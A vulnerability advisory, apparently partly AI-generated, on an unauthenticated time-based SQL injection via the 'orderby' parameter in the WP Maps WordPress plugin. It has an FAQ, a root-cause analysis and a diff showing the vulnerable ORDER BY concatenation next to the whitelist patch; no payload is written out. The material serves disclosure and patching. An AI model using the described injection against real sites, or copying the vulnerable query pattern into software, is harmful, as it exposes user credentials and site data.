What is CVE -2026-2580?

CVE-2026-2580 is a high-severity SQL injection vulnerability found in the WP Maps – Store Locator plugin for WordPress. It allows unauthenticated attackers to exploit the ‘orderby’ parameter to execute arbitrary SQL queries, potentially leading to sensitive data extraction.

How does the SQL injection work?

The vulnerability arises from insufficient input validation in the plugin’s SQL query construction. Attackers can manipulate the ‘orderby’ parameter in HTTP GET requests to inject SQL commands, allowing them to extract information from the database using time-based blind SQL injection techniques.

Who is affected by this vulnerability?

Any WordPress site using the WP Maps – Store Locator plugin version 4.9.1 or earlier is vulnerable. Administrators can check their plugin version in the WordPress dashboard under the Plugins section.

How can I check if my site is vulnerable?

To verify if your site is vulnerable, check the version of the WP Maps plugin installed. If it is version 4.9.1 or lower, your site is at risk. Additionally, you can review logs for suspicious requests to admin pages.

What steps should I take to mitigate this vulnerability?

To mitigate this vulnerability, update the WP Maps plugin to version 4.9.2 or later, where the issue has been patched. Regularly check for plugin updates and apply them promptly to maintain security.

What does the CVSS score of 7.5 indicate?

A CVSS score of 7.5 indicates a high severity level, meaning that the vulnerability poses a significant risk to the system. It suggests that successful exploitation could lead to severe consequences, including data breaches.

What kind of data could be compromised?

Successful exploitation of this vulnerability could allow attackers to access sensitive information stored in the WordPress database, including user credentials, plugin settings, and location data.

What is a proof of concept (PoC) in this context?

A proof of concept (PoC) demonstrates how the SQL injection vulnerability can be exploited. The provided PoC script shows how an attacker can send crafted requests to the vulnerable plugin to execute SQL commands and extract data.

Is remote code execution possible through this vulnerability?

While direct remote code execution is unlikely through this SQL injection vector, gaining database access can lead to other security issues such as privilege escalation and full site takeover.

What are time-based blind SQL injection techniques?

Time-based blind SQL injection techniques involve sending SQL queries that cause a delay in response, such as using the SLEEP() function. By measuring the response time, an attacker can infer whether their payload was successful.

How can I prevent similar vulnerabilities in the future?

To prevent similar vulnerabilities, ensure proper input validation and sanitization in your code. Regularly audit your plugins and themes for security issues, and stay informed about vulnerabilities affecting your WordPress site.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the WP Maps plugin until a patch can be applied. Additionally, monitor your site for unusual activity and restrict access to admin pages to trusted users only.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 23, 2026

CVE-2026-2580: WP Maps – Store Locator,Google Maps,OpenStreetMap,Mapbox,Listing,Directory & Filters <= 4.9.1 – Unauthenticated SQL Injection via 'orderby' Parameter (wp-google-map-plugin)

CVE ID CVE-2026-2580

Plugin wp-google-map-plugin

Severity High (CVSS 7.5)

CWE 89

Vulnerable Version 4.9.1

Patched Version 4.9.2

Disclosed March 21, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-2580:
This vulnerability is an unauthenticated time-based SQL injection in the WP Maps plugin, affecting versions up to and including 4.9.1. The flaw resides in the plugin’s tabular data handling component, specifically in the orderby parameter processing. Attackers can exploit this to extract sensitive information from the database, with a CVSS score of 7.5.

The root cause is insufficient input validation and insecure SQL query construction in the prepare_items() method within /wp-google-map-plugin/core/class.tabular.php. The vulnerable code directly concatenates user-controlled $_GET[‘orderby’] and $_GET[‘order’] parameters into SQL ORDER BY clauses without proper whitelist validation. The usort_reorder() function in the same file also uses sanitize_text_field() which fails to prevent SQL injection. The is_column() method in /wp-google-map-plugin/core/class.model.php previously only checked for backticks, allowing arbitrary string injection.

Exploitation occurs via unauthenticated HTTP requests to WordPress admin pages where the plugin’s tabular interface is loaded. Attackers send crafted GET requests with malicious orderby parameters containing SQL injection payloads. The attack vector targets any admin listing page using the WPGMP_Tabular class, such as location, map, or route management pages. Payloads use time-based blind SQL injection techniques with SLEEP() or BENCHMARK() functions to extract data.

The patch implements multiple security improvements. It adds a $page_slug property to restrict pro feature modifications to plugin pages only. The usort_reorder() function now validates orderby against a whitelist of sortable columns using sanitize_key() and in_array() checks. The prepare_items() method implements strict column whitelisting for ORDER BY clauses. The is_column() method is rewritten to validate against an $allowed_columns array populated via DESCRIBE table queries. Model classes now call load_columns() to initialize allowed columns.

Successful exploitation allows complete database compromise. Attackers can extract sensitive information including WordPress user credentials, plugin configuration data, location coordinates, and other stored content. The vulnerability enables data exfiltration through time-based inference attacks. While direct remote code execution is unlikely through this vector, database access can lead to privilege escalation and full site takeover.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/wp-google-map-plugin/classes/wpgmp-pro-feature-ui.php
+++ b/wp-google-map-plugin/classes/wpgmp-pro-feature-ui.php
@@ -6,7 +6,15 @@

 	class WPGMP_Pro_Feature_UI_Modifier {

+		private $page_slug = false;
+
 		public function __construct() {
+
+			$page_name = isset($_GET['page']) ? sanitize_text_field($_GET['page']) : '';
+			if (strpos($page_name, 'wpgmp') !== false) {
+				$this->page_slug = true;
+			}
+
 			add_filter( 'wpgmp_form_footer_html', [ $this, 'append_pro_upgrade_modal_to_footer' ] );
 			add_filter( 'wpgmp_field_group_label', [ $this, 'add_pro_suffix_to_label' ], 10, 2 );
 			add_filter( 'wpgmp_input_label', [ $this, 'add_pro_suffix_to_label' ], 10, 2 );
@@ -18,65 +26,72 @@
 		}

 		public function wpgmp_template_directory($is_pro,$directory,$name,$atts) {
-
-			if(strstr($directory,'layout')) {
-				return true;
-			}
-
-			if(!strstr($directory,'default') and strstr($name,"item_skin")) {
-				return true;
+			if ($this->page_slug) {
+				if(strstr($directory,'layout')) {
+					return true;
+				}
+
+				if(!strstr($directory,'default') and strstr($name,"item_skin")) {
+					return true;
+				}
 			}

-
-
 			return $is_pro;

 		}
 		public function wpgmp_element_before_start_row($element,$name,$atts) {
-
-			if ( WPGMP_Helper::wpgmp_is_feature_available($name, 'google') ) {
-				$not_available_class = 'fc-feature-not-available';
-			} else{
-				$not_available_class = '';
+			if ($this->page_slug) {
+				if ( WPGMP_Helper::wpgmp_is_feature_available($name, 'google') ) {
+					$not_available_class = 'fc-feature-not-available';
+				} else{
+					$not_available_class = '';
+				}
+
+				if ( isset($atts['pro']) && $atts['pro'] == true && $atts['type'] == 'group') {
+					$pro_feature_class = 'fc-pro-feature';
+					$element = '<dt><section id="'.$name.'" class="fc-form-group {modifier} '.$atts['parent_class'].' '.$not_available_class.' '.$pro_feature_class.'">';
+				}
+
+				if ( isset($atts['pro']) && $atts['pro'] == true && $atts['type'] != 'group' && $atts['type'] != 'submit' && $atts['type'] != 'button') {
+					$pro_feature_class_lock = 'fc-pro-feature-lock';
+					$element = '<section class="fc-form-group fc-row {modifier} '.$atts['parent_class'].' '.$not_available_class.' '.$pro_feature_class_lock .'">';
+				}
 			}

-			if ( isset($atts['pro']) && $atts['pro'] == true && $atts['type'] == 'group') {
-				$pro_feature_class = 'fc-pro-feature';
-				$element = '<dt><section id="'.$name.'" class="fc-form-group {modifier} '.$atts['parent_class'].' '.$not_available_class.' '.$pro_feature_class.'">';
-			}
-
-			if ( isset($atts['pro']) && $atts['pro'] == true && $atts['type'] != 'group' && $atts['type'] != 'submit' && $atts['type'] != 'button') {
-				$pro_feature_class_lock = 'fc-pro-feature-lock';
-				$element = '<section class="fc-form-group fc-row {modifier} '.$atts['parent_class'].' '.$not_available_class.' '.$pro_feature_class_lock .'">';
-			}
-
 			return $element;

-			}
+		}

 		public function handle_pro_submit_button( $element, $name, $atts ) {
-			$no_sticky = ( isset( $atts['no-sticky'] ) && $atts['no-sticky'] === 'true' ) ? 'fc-no-sticky' : 'fc-sticky';
+			if ($this->page_slug) {
+				$no_sticky = ( isset( $atts['no-sticky'] ) && $atts['no-sticky'] === 'true' ) ? 'fc-no-sticky' : 'fc-sticky';

-			if ( isset( $atts['pro'] ) && $atts['pro'] === true ) {
-				$element = '<div class="' . esc_attr( $no_sticky ) . ' fc-form-footer">
-								<a href="javascript:void(0);" name="' . esc_attr( $name ) . '" class="fc-btn fc-btn-purple fc-modal-open">
-									<i class="wep-icon-crown wep-icon-lg"></i><span>' . esc_html__( 'Upgrade to Pro', 'wp-google-map-plugin' ) . '</span>
-								</a>
-							</div>';
+				if ( isset( $atts['pro'] ) && $atts['pro'] === true ) {
+					$element = '<div class="' . esc_attr( $no_sticky ) . ' fc-form-footer">
+									<a href="javascript:void(0);" name="' . esc_attr( $name ) . '" class="fc-btn fc-btn-purple fc-modal-open">
+										<i class="wep-icon-crown wep-icon-lg"></i><span>' . esc_html__( 'Upgrade to Pro', 'wp-google-map-plugin' ) . '</span>
+									</a>
+								</div>';
+				}
 			}
 			return $element;
 		}

 		public function add_pro_suffix_to_label( $value, $atts ) {
-			if ( isset( $atts['pro'] ) && $atts['pro'] === true ) {
-				$value .= ' <span class="fc-badge fc-badge-pro">' . esc_html__( 'PRO', 'wp-google-map-plugin' ) . '</span>';
+			if ($this->page_slug) {
+				if ( isset( $atts['pro'] ) && $atts['pro'] === true ) {
+					$value .= ' <span class="fc-badge fc-badge-pro">' . esc_html__( 'PRO', 'wp-google-map-plugin' ) . '</span>';
+				}
 			}
 			return $value;
 		}

 		public function append_pro_upgrade_modal_to_footer( $output ) {
-			$modal_html = WPGMP_Helper::wpgmp_render_pro_upgrade_modal();
-			return $output . $modal_html;
+			if ($this->page_slug) {
+				$modal_html = WPGMP_Helper::wpgmp_render_pro_upgrade_modal();
+				return $output . $modal_html;
+			}
+			return $output;
 		}
 	}
 }
--- a/wp-google-map-plugin/classes/wpgmp-security.php
+++ b/wp-google-map-plugin/classes/wpgmp-security.php
@@ -92,14 +92,21 @@
             $value = trim( $value );

              // Either map widht is a just a plain number.
-            if ( is_numeric( $value ) ) {
-                return absint( $value );
-            }
+

             // Or map width can be a number with % sign.
             $pattern = '/^([1-9][0-9]*)(%)?$/';
             if ( preg_match( $pattern, $value ) ) {
                 return $value;
+            }else if ( is_numeric( $value ) ) {
+                return absint( $value );
+            }else if( ! is_numeric( $value ) ){
+                $width = absint ( sanitize_text_field( $value ) );
+                if($width === 0){
+                    return '100%';
+                }else{
+                    return $width;
+                }
             }

             return '';
--- a/wp-google-map-plugin/core/class.model.php
+++ b/wp-google-map-plugin/core/class.model.php
@@ -40,6 +40,12 @@
 		 */
 		private $query = '';
 		/**
+		 * Table columns assoicated to the model class.
+		 *
+		 * @var string
+		 */
+		public $allowed_columns = [];
+		/**
 		 * Table name assoicated to the model class.
 		 *
 		 * @var string
@@ -156,6 +162,29 @@
 			return true;

 		}
+
+		/**
+		 * Load and cache the list of valid database columns for the current table.
+		 *
+		 * This method retrieves the
+		 */
+
+		protected function load_columns() {
+
+			if ( empty( $this->table ) ) {
+				return;
+			}
+
+			global $wpdb;
+
+			$columns = $wpdb->get_results( "DESCRIBE `{$this->table}`", ARRAY_A );
+
+			if ( ! empty( $columns ) ) {
+
+				$this->allowed_columns = array_column( $columns, 'Field' );
+
+			}
+		}
 		/**
 		 * Retrive records from database based on conditional array.
 		 *
@@ -189,15 +218,17 @@
 						}
 						if ( isset( $this->pog_attribute_type[ $fcv_array[ $i ][0] ]['db_attributes'] ) && 'NUMERIC' != $this->pog_attribute_type[ $fcv_array[ $i ][0] ]['db_attributes'][0] && 'SET' != $this->pog_attribute_type[ $fcv_array[ $i ][0] ]['db_attributes'][0] ) {
 							if ( 1 == $GLOBALS['configuration']['db_encoding'] ) {
-								$value        = $this->is_column( $fcv_array[ $i ][2] ) ? 'BASE64_DECODE(' . $fcv_array[ $i ][2] . ')' : "'" . $fcv_array[ $i ][2] . "'";
+
+								$value = $this->is_column( $fcv_array[ $i ][2] ) ? 'BASE64_DECODE(`' . trim( $fcv_array[ $i ][2], '`' ) . '`)'     : "'" . $this->escape( $fcv_array[ $i ][2] ) . "'";
 								$this->query .= 'BASE64_DECODE(`' . $fcv_array[ $i ][0] . '`) ' . $fcv_array[ $i ][1] . ' ' . $value;
 							} else {
-								$value        = $this->is_column( $fcv_array[ $i ][2] ) ? $fcv_array[ $i ][2] : "'" . $this->escape( $fcv_array[ $i ][2] ) . "'";
+
+								$value = $this->is_column( $fcv_array[ $i ][2] ) ? '`' . trim( $fcv_array[ $i ][2], '`' ) . '`' : "'" . $this->escape( $fcv_array[ $i ][2] ) . "'";
 								$this->query .= '`' . $fcv_array[ $i ][0] . '` ' . $fcv_array[ $i ][1] . ' ' . $value;
 							}
 						} else {

-							$value = $this->is_column( $fcv_array[ $i ][2] ) ? $fcv_array[ $i ][2] : "'" . $fcv_array[ $i ][2] . "'";
+							$value = $this->is_column( $fcv_array[ $i ][2] ) ? '`' . trim( $fcv_array[ $i ][2], '`' ) . '`' : "'" . $this->escape( $fcv_array[ $i ][2] ) . "'";
 							if ( 'in' == strtolower( $fcv_array[ $i ][1] ) ) {
 								$value = str_replace( "'", '', $value );
 								$value = '(' . $value . ')';
@@ -326,16 +357,18 @@
 		 * @param  string $value Column name.
 		 * @return boolean        True or False.
 		 */
-		public static function is_column( $value ) {
-
-			if ( strlen( $value ) > 2 ) {
-				if ( substr( $value, 0, 1 ) == '`' && substr( $value, strlen( $value ) - 1, 1 ) == '`' ) {
-					return true;
-				}
-				return false;
-			}
-
-			return false;
+		public function is_column( $value ) {
+		    if ( ! is_string( $value ) || empty( $this->allowed_columns ) ) {
+		        return false;
+		    }
+
+		    $clean = trim( $value, '`' );
+
+		    if ( ! preg_match( '/^[a-zA-Z0-9_]+$/', $clean ) ) {
+		        return false;
+		    }
+
+		    return in_array( $clean, $this->allowed_columns, true );
 		}
 		/**
 		 * Convert XML to array.
--- a/wp-google-map-plugin/core/class.tabular.php
+++ b/wp-google-map-plugin/core/class.tabular.php
@@ -522,11 +522,34 @@
 		 * @return string    Winner element.
 		 */
 		function usort_reorder( $a, $b ) {
-
-			$orderby = ( ! empty( $_GET['orderby'] ) ) ? sanitize_text_field( wp_unslash( $_GET['orderby'] ) ) : '';
-			$order   = ( ! empty( $_GET['order'] ) ) ? sanitize_text_field( wp_unslash( $_GET['order'] ) ) : 'asc';
-			$result  = strcmp( $a[ $orderby ], $b[ $orderby ] );
-			return ( 'asc' == $order ) ? $result : -$result;
+
+			/* ---- Allowed sortable columns (WHITELIST) ---- */
+			$sortable_columns = $this->get_sortable_columns();
+			$allowed_orderby  = array_keys( $sortable_columns );
+
+			/* ---- Validate orderby ---- */
+			$orderby = isset($_GET['orderby'])
+				? sanitize_key( wp_unslash( $_GET['orderby'] ) )
+				: $this->primary_col;
+
+			if ( ! in_array( $orderby, $allowed_orderby, true ) ) {
+				$orderby = $this->primary_col;
+			}
+
+			/* ---- Validate order ---- */
+			$order = isset($_GET['order'])
+				? strtolower( sanitize_key( wp_unslash( $_GET['order'] ) ) )
+				: 'asc';
+
+			$order = ( $order === 'desc' ) ? 'desc' : 'asc';
+
+			/* ---- Prevent undefined index notices ---- */
+			$value_a = isset($a[$orderby]) ? $a[$orderby] : '';
+			$value_b = isset($b[$orderby]) ? $b[$orderby] : '';
+
+			$result = strcmp( (string) $value_a, (string) $value_b );
+
+			return ( $order === 'asc' ) ? $result : -$result;
 		}
 		/**
 		 * Get bulk actions.
@@ -703,117 +726,137 @@
 		/**
 		 * Prepare records before print.
 		 */
-		function prepare_items() {

+		function prepare_items() {
+
 			global $wpdb;
+
 			$columns               = $this->get_columns();
 			$hidden                = array();
 			$sortable              = $this->get_sortable_columns();
 			$this->_column_headers = array( $columns, $hidden, $sortable );
+
 			$this->process_bulk_action();
+
 			$query = ( empty( $this->sql ) ) ? 'SELECT * FROM ' . $this->table : $this->sql;
-			if( isset( $_GET['page'] ) && !empty( $_GET['page'] ) ){
-				$query = apply_filters('fc_manage_page_basic_query', $query , sanitize_text_field( wp_unslash( $_GET['page'] ) ) ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
-
-			}
-
-			if ( isset( $_GET['page'] ) && isset( $_REQUEST['s'] ) ) {
-				$page = sanitize_text_field( wp_unslash( $_GET['page'] ) );
-				$search = sanitize_text_field( wp_unslash( $_REQUEST['s'] ) );
-			} else {
-				$page = '';
-				$search = '';
+
+			if ( isset( $_GET['page'] ) && ! empty( $_GET['page'] ) ) {
+				$query = apply_filters(
+					'fc_manage_page_basic_query',
+					$query,
+					sanitize_text_field( wp_unslash( $_GET['page'] ) )
+				);
 			}
-
-			if(!$this->noSql){
-
-				if ( $this->admin_listing_page_name == $page && '' != $search ) {
-
+
+			$page   = isset($_GET['page']) ? sanitize_text_field( wp_unslash($_GET['page']) ) : '';
+			$search = isset($_REQUEST['s']) ? sanitize_text_field( wp_unslash($_REQUEST['s']) ) : '';
+
+			if ( ! $this->noSql ) {
+
+				/* ================= SEARCH ================= */
+				if ( $this->admin_listing_page_name == $page && '' !== $search ) {
+
 					$s = $search;
-					$first_column = '';
-					$remaining_columns  = array();
 					$prepare_query_with_placeholders = '';
 					$prepare_args_values = array();
-
+					$first = true;
+
 					foreach ( $this->columns as $column_name => $columnlabel ) {
-
-						if ( "{$this->primary_col}" == $column_name ) {
-							 continue;
+
+						if ( $column_name === $this->primary_col ) {
+							continue;
+						}
+
+						if (
+							isset($this->searchExclude)
+							&& ! empty($this->searchExclude)
+							&& in_array($column_name, $this->searchExclude, true)
+						) {
+							continue;
+						}
+
+						$prepare_args_values[] = '%' . $wpdb->esc_like( $s ) . '%';
+
+						if ( $first ) {
+							$prepare_query_with_placeholders .= " WHERE {$column_name} LIKE %s";
+							$first = false;
 						} else {
-
-							if ( empty( $first_column ) ) {
-
-								$first_column = $column_name;
-								$prepare_args_values[] = $wpdb->esc_like($s);
-								$prepare_query_with_placeholders = " WHERE {$column_name} LIKE '%%%s%%'";
-
-
-							} else {
-
-								$remaining_columns[] = $column_name;
-								if ( isset($this->searchExclude) && !empty($this->searchExclude) && !in_array( $column_name, $this->searchExclude ) ) {
-									$prepare_args_values[] = $wpdb->esc_like($s);
-									$prepare_query_with_placeholders .= " or {$column_name} LIKE '%%%s%%'";
-
-								}
-
-								if(!isset($this->searchExclude) ){
-									$prepare_args_values[] = $wpdb->esc_like($s);
-									$prepare_query_with_placeholders .= " or {$column_name} LIKE '%%%s%%'";
-								}
-							}
+							$prepare_query_with_placeholders .= " OR {$column_name} LIKE %s";
 						}
 					}
-
-					// phpcs:ignore WordPress.DB.PreparedSQL.NotPrepared -- $this->table and $this->primary_col are internal class properties
-					$this->data = $wpdb->get_results(  $wpdb->prepare( 'SELECT * FROM '.$this->table. $prepare_query_with_placeholders. ' order by '.$this->primary_col.' desc', $prepare_args_values )  );
-
-				}
-				else if ( isset($_GET['orderby']) && ! empty( $_GET['orderby'] ) && isset($_GET['order']) && ! empty( $_GET['order'] ) ) {
-
-					$_GET['orderby'] = sanitize_text_field( $_GET['orderby'] );
-					$_GET['order'] = sanitize_text_field( $_GET['order'] );
-					$orderby = ( !empty( $_GET['orderby'] ) ) ? wp_unslash( $_GET['orderby'] ) : $this->primary_col;
-					$order   = ( !empty( $_GET['order'] ) ) ? wp_unslash( $_GET['order'] ) : 'asc';
-
-						$query_to_run  = $query;
-						$query_to_run .= " order by {$orderby} {$order}";
-						// phpcs:ignore WordPress.DB.PreparedSQL.NotPrepared -- $query_to_run is safe
-						$this->data = $wpdb->get_results( $query_to_run );
-
-					}
-				 else {
-
-						$query_to_run = $query;
-						$query_to_run .= " order by {$this->primary_col} desc";
-						$query_to_run = apply_filters('fc_manage_page_default_query', $query_to_run , sanitize_text_field( wp_unslash( $_GET['page'] ) ) ); // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
-
-						// phpcs:ignore WordPress.DB.PreparedSQL.NotPrepared -- $query_to_run is safe
-						$this->data = $wpdb->get_results( $query_to_run );
-
+
+					// phpcs:ignore WordPress.DB.PreparedSQL.NotPrepared
+					$this->data = $wpdb->get_results(
+						$wpdb->prepare(
+							'SELECT * FROM ' . $this->table . $prepare_query_with_placeholders .
+							' ORDER BY ' . $this->primary_col . ' DESC',
+							$prepare_args_values
+						)
+					);
+
+				/* ================= SAFE ORDER BY ================= */
+				} elseif ( isset($_GET['orderby']) && isset($_GET['order']) ) {
+
+					/* ---- WHITELIST ORDERBY ---- */
+					$sortable_columns = $this->get_sortable_columns();
+					$allowed_orderby  = array_keys( $sortable_columns );
+
+					$orderby = sanitize_key( wp_unslash( $_GET['orderby'] ) );
+
+					if ( ! in_array( $orderby, $allowed_orderby, true ) ) {
+						$orderby = $this->primary_col;
 					}
-
-			}else{
-
-				if(isset($this->external) && !empty($this->external)){
-					$this->data   = $this->external;
+
+					/* ---- STRICT ORDER VALIDATION ---- */
+					$order = strtolower( sanitize_key( wp_unslash( $_GET['order'] ) ) );
+					$order = ( $order === 'desc' ) ? 'DESC' : 'ASC';
+
+					$query_to_run  = $query;
+					$query_to_run .= " ORDER BY {$orderby} {$order}";
+
+					// phpcs:ignore WordPress.DB.PreparedSQL.NotPrepared -- identifiers are whitelist validated
+					$this->data = $wpdb->get_results( $query_to_run );
+
+				/* ================= DEFAULT ================= */
+				} else {
+
+					$query_to_run  = $query;
+					$query_to_run .= " ORDER BY {$this->primary_col} DESC";
+
+					$query_to_run = apply_filters(
+						'fc_manage_page_default_query',
+						$query_to_run,
+						$page
+					);
+
+					// phpcs:ignore WordPress.DB.PreparedSQL.NotPrepared
+					$this->data = $wpdb->get_results( $query_to_run );
 				}
-
-			}
-
-			$current_page = apply_filters('fc_tabular_set_pagination_page',$this->get_pagenum()) ; // phpcs:ignore WordPress.NamingConventions.PrefixAllGlobals.NonPrefixedHooknameFound
-
-			$total_items  = count( $this->data );
-			if ( is_array( $this->data ) && ! empty( $this->data ) ) {
-				$this->found_data = @array_slice( $this->data, ( ( $current_page - 1 ) * $this->per_page ), $this->per_page );
+
 			} else {
-				$this->found_data = array();
+
+				if ( isset($this->external) && ! empty($this->external) ) {
+					$this->data = $this->external;
+				}
 			}
-
-			$p_data = array( 'total_items' => $total_items,	'per_page' => $this->per_page );
-			$this->set_pagination_args($p_data);
+
+			$current_page = apply_filters(
+				'fc_tabular_set_pagination_page',
+				$this->get_pagenum()
+			);
+
+			$total_items = count( $this->data );
+
+			$this->found_data = ( is_array($this->data) && ! empty($this->data) )
+				? array_slice( $this->data, ( ($current_page - 1) * $this->per_page ), $this->per_page )
+				: array();
+
+			$this->set_pagination_args(array(
+				'total_items' => $total_items,
+				'per_page'    => $this->per_page,
+			));
+
 			$this->items = $this->found_data;
-
 		}

 	}
--- a/wp-google-map-plugin/modules/drawing/model.drawing.php
+++ b/wp-google-map-plugin/modules/drawing/model.drawing.php
@@ -36,21 +36,7 @@
 		}

 		function save() {
-			global  $_POST;
-
-			if ( isset( $_POST['map_id'] ) ) {
-				$map_id                                       = intval( wp_unslash( $_POST['map_id'] ) );
-				$data['polylines'][0]                         = $_POST['shapes_values'];
-				$infowindow['map_polyline_setting']['shapes'] = serialize( $data );
-				$in_loc_data                                  = array(
-					'map_polyline_setting' => $infowindow['map_polyline_setting']['shapes'],
-				);
-				$where['map_id']                              = $map_id;
-
-				FlipperCode_Database::insert_or_update( TBL_MAP, $in_loc_data, $where );
-			}
-
-			unset( $_POST['operation'] );
+
 		}
 	}
 }
--- a/wp-google-map-plugin/modules/group_map/model.group_map.php
+++ b/wp-google-map-plugin/modules/group_map/model.group_map.php
@@ -32,6 +32,7 @@
 		function __construct() {
 			$this->table     = TBL_GROUPMAP;
 			$this->unique    = 'group_map_id';
+			$this->load_columns();
 			$this->validations = [
 				'group_map_title' => [
 					'req'     => esc_html__( 'Please enter title for marker category.', 'wp-google-map-plugin' ),
--- a/wp-google-map-plugin/modules/location/model.location.php
+++ b/wp-google-map-plugin/modules/location/model.location.php
@@ -22,6 +22,7 @@
 		public function __construct() {
 			$this->table     = TBL_LOCATION;
 			$this->unique    = 'location_id';
+			$this->load_columns();
 			$this->validations = array(
 				'location_title'   => array(
 					'req'     => esc_html__( 'Please enter location title.', 'wp-google-map-plugin' ),
--- a/wp-google-map-plugin/modules/map/model.map.php
+++ b/wp-google-map-plugin/modules/map/model.map.php
@@ -49,6 +49,7 @@
 			);
 			$this->table  = TBL_MAP;
 			$this->unique = 'map_id';
+			$this->load_columns();
 		}
 		/**
 		 * Admin menu for CRUD Operation
--- a/wp-google-map-plugin/modules/permissions/model.permissions.php
+++ b/wp-google-map-plugin/modules/permissions/model.permissions.php
@@ -38,66 +38,7 @@
 		 * Save Permissions
 		 */
 		function save() {
-			global $_POST;
-			if ( isset( $_REQUEST['_wpnonce'] ) ) {
-				$nonce = sanitize_text_field( wp_unslash( $_REQUEST['_wpnonce'] ) ); }
-
-			if ( isset( $nonce ) and ! wp_verify_nonce( $nonce, 'wpgmp-nonce' ) ) {
-
-				die( 'Cheating...' );
-
-			}
-			global $wp_roles;
-			$wpgmp_roles = $wp_roles->get_names();
-			unset( $wpgmp_roles['administrator'] );
-			$wpgmp_permissions = array(
-				'wpgmp_admin_overview'   => esc_html__('Map Overview','wp-google-map-plugin'),
-				'wpgmp_form_location'    => esc_html__('Add Locations','wp-google-map-plugin'),
-				'wpgmp_manage_location'  => esc_html__('Manage Locations','wp-google-map-plugin'),
-				'wpgmp_import_location'  => esc_html__('Import Locations','wp-google-map-plugin'),
-				'wpgmp_form_map'         => esc_html__('Create Map','wp-google-map-plugin'),
-				'wpgmp_manage_map'       => esc_html__('Manage Map','wp-google-map-plugin'),
-				'wpgmp_manage_drawing'   => esc_html__('Drawing','wp-google-map-plugin'),
-				'wpgmp_form_group_map'   => esc_html__('Add Marker Category','wp-google-map-plugin'),
-				'wpgmp_manage_group_map' => esc_html__('Manage Marker Category','wp-google-map-plugin'),
-				'wpgmp_form_route'       => esc_html__('Add Routes','wp-google-map-plugin'),
-				'wpgmp_manage_route'     => esc_html__('Manage Routes','wp-google-map-plugin'),
-				'wpgmp_settings'         => esc_html__('Settings','wp-google-map-plugin'),
-			);
-			$this->verify( $_POST );
-
-			if ( is_array( $this->errors ) and ! empty( $this->errors ) ) {
-				$this->throw_errors();
-			}
-			if ( isset( $_POST['wpgmp_save_permission'] ) ) {
-
-				if ( isset( $_POST['wpgmp_map_permissions'] ) ) {
-					$wpgmp_map_permissions = wp_unslash( $_POST['wpgmp_map_permissions'] );
-				} else {
-					$wpgmp_map_permissions = array();
-				}
-
-				if ( ! empty( $wpgmp_roles ) ) {
-					foreach ( $wpgmp_roles as $wpgmp_role_key => $wpgmp_role_value ) {
-						if ( $wpgmp_role_key == 'administrator' && is_admin() && current_user_can( 'manage_options' ) ) {
-							continue; }
-
-						$role = get_role( $wpgmp_role_key );
-
-						if ( ! empty( $wpgmp_permissions ) ) {
-							foreach ( $wpgmp_permissions as $wpgmp_mkey => $wpgmp_mvalue ) {
-								if ( isset( $wpgmp_map_permissions[ $wpgmp_role_key ][ $wpgmp_mkey ] ) ) {
-									$role->add_cap( $wpgmp_mkey );
-								} else {
-									$role->remove_cap( $wpgmp_mkey );
-								}
-							}
-						}
-					}
-				}
-			}
-			$response['success'] = esc_html__( 'Permissions were saved successfully.', 'wp-google-map-plugin' );
-			return $response;
+
 		}

 	}
--- a/wp-google-map-plugin/modules/permissions/views/manage.php
+++ b/wp-google-map-plugin/modules/permissions/views/manage.php
@@ -54,7 +54,7 @@
 					'current' => ( ( @array_key_exists( $wpgmp_mkey, $urole->capabilities ) == true ) ? 'true' : 'false' ),
 					'before'  => '<div class="fc-1">',
 					'after'   => '</div>',
-					'class'   => 'fc-form-check-input chkbox_class',
+					'class'   => 'fc-form-check-input chkbox_class wpgmp_author_permission',
 				)
 			);
 		}
--- a/wp-google-map-plugin/modules/route/model.route.php
+++ b/wp-google-map-plugin/modules/route/model.route.php
@@ -20,6 +20,7 @@
 		public function __construct() {
 			$this->table  = TBL_ROUTES;
 			$this->unique = 'route_id';
+			$this->load_columns();
 			$this->validations = array(
 				'route_title' => array(
 					'req'     => esc_html__( 'Please enter route title.', 'wp-google-map-plugin' ),
@@ -55,80 +56,15 @@
 		}

 		public function fetch( $where = array() ) {
-			$routes = $this->get( $this->table, $where );
-
-			foreach ( (array) $routes as $route ) {
-				$route->route_way_points  = maybe_unserialize( $route->route_way_points );
-				$route->extensions_fields = maybe_unserialize( $route->extensions_fields );
-			}
-
-			return apply_filters( 'wpgmp_route_results', $routes, $where );
+
 		}

 		public function save() {
-			if ( ! isset( $_REQUEST['_wpnonce'] ) || ! wp_verify_nonce( sanitize_text_field( $_REQUEST['_wpnonce'] ), 'wpgmp-nonce' ) ) {
-				wp_die( esc_html__( 'You are not allowed to save changes!', 'wp-google-map-plugin' ) );
-			}
-
-			$this->verify( $_POST );
-			$this->errors = apply_filters( 'wpgmp_route_validation', $this->errors, $_POST );
-
-			$waypoints = ! empty( $_POST['route_way_points'] ) ? explode( ',', sanitize_text_field( $_POST['route_way_points'] ) ) : array();
-			if ( count( $waypoints ) > 8 ) {
-				$this->errors[] = esc_html__( 'Please do not select more than 8 locations.', 'wp-google-map-plugin' );
-			}
-
-			if ( ! empty( $this->errors ) ) {
-				$this->throw_errors();
-			}
-
-			$data = array(
-				'route_title'              => sanitize_text_field( $_POST['route_title'] ?? '' ),
-				'route_stroke_color'       => sanitize_text_field( $_POST['route_stroke_color'] ?? '' ),
-				'route_stroke_opacity'     => sanitize_text_field( $_POST['route_stroke_opacity'] ?? '' ),
-				'route_stroke_weight'      => intval( $_POST['route_stroke_weight'] ?? 0 ),
-				'route_travel_mode'        => sanitize_text_field( $_POST['route_travel_mode'] ?? '' ),
-				'route_unit_system'        => sanitize_text_field( $_POST['route_unit_system'] ?? '' ),
-				'route_marker_draggable'   => sanitize_text_field( $_POST['route_marker_draggable'] ?? '' ),
-				'route_optimize_waypoints' => sanitize_text_field( $_POST['route_optimize_waypoints'] ?? '' ),
-				'route_start_location'     => intval( $_POST['route_start_location'] ?? 0 ),
-				'route_end_location'       => intval( $_POST['route_end_location'] ?? 0 ),
-				'route_way_points'         => serialize( $waypoints ),
-				'extensions_fields'        => serialize( wp_unslash( $_POST['extensions_fields'] ?? array() ) ),
-			);
-
